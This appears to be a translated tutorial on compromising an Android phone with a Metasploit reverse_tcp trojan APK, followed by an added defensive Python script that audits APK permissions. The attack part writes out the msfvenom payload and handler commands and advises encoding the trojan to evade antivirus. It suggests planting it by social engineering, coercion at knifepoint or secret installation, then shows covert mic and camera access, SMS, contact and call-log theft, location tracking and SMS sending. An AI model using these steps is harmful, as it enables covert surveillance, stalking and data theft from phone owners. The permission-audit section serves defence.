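The approach is similar to compromising Windows or Linux targets; only some of the commands used against the target differ, such as geolocation and sending SMS.
Generating the trojan file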
┌─[root@parrot]─[~]
└──╼ #msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.168 LPORT=55555 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8826 bytes
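Note: when building the trojan file, it should be encoded multiple times for antivirus evasion; otherwise it will be detected and removed easily.
Planting it on the target Android phone
Any means will do, such as social engineering, coercion at knifepoint, or installing it in secret. In this demonstration, test.apk is copied to the Android phone, installed, and run.
Remote control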
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
At this point a session has been obtained successfully. First, check the Android version:
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.4 - Linux 3.4.0-g26e4aff-00680-gaa7791b (armv7l)
Meterpreter : java/android
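Now the target can be operated on just like a Windows target, including creating, deleting, modifying, and reading data.
Some of the following operations are specific to phones and need an introduction.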
Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam
The above are remote audio recording and camera control; the details are not covered here.
Android Commands
================
Command           Description
-------           -----------
check_root        Check if device is rooted
dump_calllog      Get call log
dump_contacts     Get contacts list
dump_sms          Get sms messages
geolocate         Get current lat-long using geolocation
interval_collect  Manage interval collection capabilities
send_sms          Sends SMS from target session
wlan_geolocate    Get current lat-long using WLAN information
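As the list above shows, it is possible to check whether the phone is rooted, retrieve the call log, contacts, and SMS records, send SMS covertly, and locate the device remotely. A few examples chosen at random follow:
Checking whether the phone is rooted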
meterpreter > check_root
[+] Device is rooted
Remote geolocation
meterpreter > geolocate
[*] Current Location:
Latitude: XX.25891
Longitude: XXX.461641
To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=XX.25891,XXX.461641&sensor=true
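Visiting the link shows that the location accuracy is also quite high.
Sending SMS under remote control
The SMS was sent successfully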
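
From the defender's side, each command listed above only works if the installed APK was granted the matching Android permission, so a sideloaded app can be triaged by its permission set before it is ever run. The following is an added example, not part of the original post: it parses `aapt dump permissions` output and reports which of those capabilities an APK could exercise. The command-to-permission mapping, the threshold, and both sample inputs are assumptions constructed for illustration.

```python
import re

# Assumed mapping (not from the original post): the Android permission(s)
# that each Meterpreter command listed above depends on.
P = "android.permission."
CAPABILITY_PERMS = {
    "record_mic": {P + "RECORD_AUDIO"},
    "webcam_*": {P + "CAMERA"},
    "dump_calllog": {P + "READ_CALL_LOG"},
    "dump_contacts": {P + "READ_CONTACTS"},
    "dump_sms": {P + "READ_SMS"},
    "send_sms": {P + "SEND_SMS"},
    "geolocate": {P + "ACCESS_FINE_LOCATION", P + "ACCESS_COARSE_LOCATION"},
    "wlan_geolocate": {P + "ACCESS_WIFI_STATE"},
}

# Handles both aapt output styles:
#   uses-permission: name='android.permission.X'
#   uses-permission: android.permission.X
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=')?([\w.]+)", re.M)

def requested_permissions(aapt_output):
    """Return the set of permission names declared in the aapt output."""
    return set(PERM_RE.findall(aapt_output))

def audit(aapt_output, threshold=5):
    """List the capabilities the APK could use; flag it when the count
    reaches the (heuristic, assumed) threshold."""
    perms = requested_permissions(aapt_output)
    enabled = sorted(c for c, need in CAPABILITY_PERMS.items() if need & perms)
    return {"enabled": enabled, "suspicious": len(enabled) >= threshold}

# Constructed sample: an "updater" app asking for a surveillance-grade set.
SAMPLE_SUSPECT = """package: com.example.updater
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.SEND_SMS'
uses-permission: android.permission.READ_CONTACTS
uses-permission: android.permission.READ_CALL_LOG
uses-permission: android.permission.ACCESS_FINE_LOCATION
"""
# Constructed sample: a camera app with a narrow permission set.
SAMPLE_BENIGN = """package: com.example.camera
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.CAMERA'
"""

if __name__ == "__main__":
    for name, text in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(name, audit(text))
```

A high count is a triage signal, not proof of malice: legitimate messaging or backup apps request similar sets, so the result should be weighed against what the app claims to do.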